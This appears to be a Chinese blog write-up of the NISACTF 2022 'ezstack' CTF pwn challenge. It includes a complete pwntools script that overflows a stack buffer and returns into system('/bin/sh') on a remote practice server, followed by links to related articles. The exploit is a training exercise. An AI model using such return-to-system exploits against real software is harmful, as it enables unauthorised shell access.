[NISACTF 2022]ezstack-入土为安的第十四天

简介: [NISACTF 2022]ezstack-入土为安的第十四天

签到题吧

checksec pwn  没有保护

进入main函数,点进shell ,buf 88808048buf

system 08048512

'/bin/sh 0804A024

直接让代码溢出调用system和/bin/sh

from pwn import *
# 连接到远程服务
p = remote('node5.anna.nssctf.cn', 20789)
# 构造 payload
payload = b'a' * (0x48 + 0x4) + p32(0x08048512) + p32(0x804A024)
# 发送 payload
p.sendlineafter('NISACTF', payload)
# 进入交互模式
p.interactive()

目录
相关文章
|
Shell
[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天
[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天
501 0
|
Shell
[NISACTF 2022]ezpie- 入土为安的第十五天
[NISACTF 2022]ezpie- 入土为安的第十五天
264 0
|
存储 分布式计算 资源调度
Hadoop运行模式(三)、群起集群、配置workers、启动集群、启动HDFS、拼接、Web端查看HDFS的NameNode、Web端查看YARN的ResourceManager
Hadoop运行模式(三)、群起集群、配置workers、启动集群、启动HDFS、拼接、Web端查看HDFS的NameNode、Web端查看YARN的ResourceManager
Hadoop运行模式(三)、群起集群、配置workers、启动集群、启动HDFS、拼接、Web端查看HDFS的NameNode、Web端查看YARN的ResourceManager
|
NoSQL Ubuntu Linux
CTF-Pwn 入门:环境搭建
CTF-Pwn 入门:环境搭建
[HDCTF2019]Maze(初识逆向)
[HDCTF2019]Maze(初识逆向)
578 1
|
安全
[MoeCTF 2022]babyfmt-入土为安的第十九天
[MoeCTF 2022]babyfmt-入土为安的第十九天
189 0
|
存储 安全 Java
缓冲区溢出之堆溢出(Heap Overflow)
【8月更文挑战第18天】
861 3
|
监控 安全 网络安全
PHP代码审计之简单思路方法
PHP代码审计之简单思路方法
341 1
|
安全 网络安全 API
WSO2 products 文件上传(CVE-2022-29464)
WSO2 products 文件上传(CVE-2022-29464)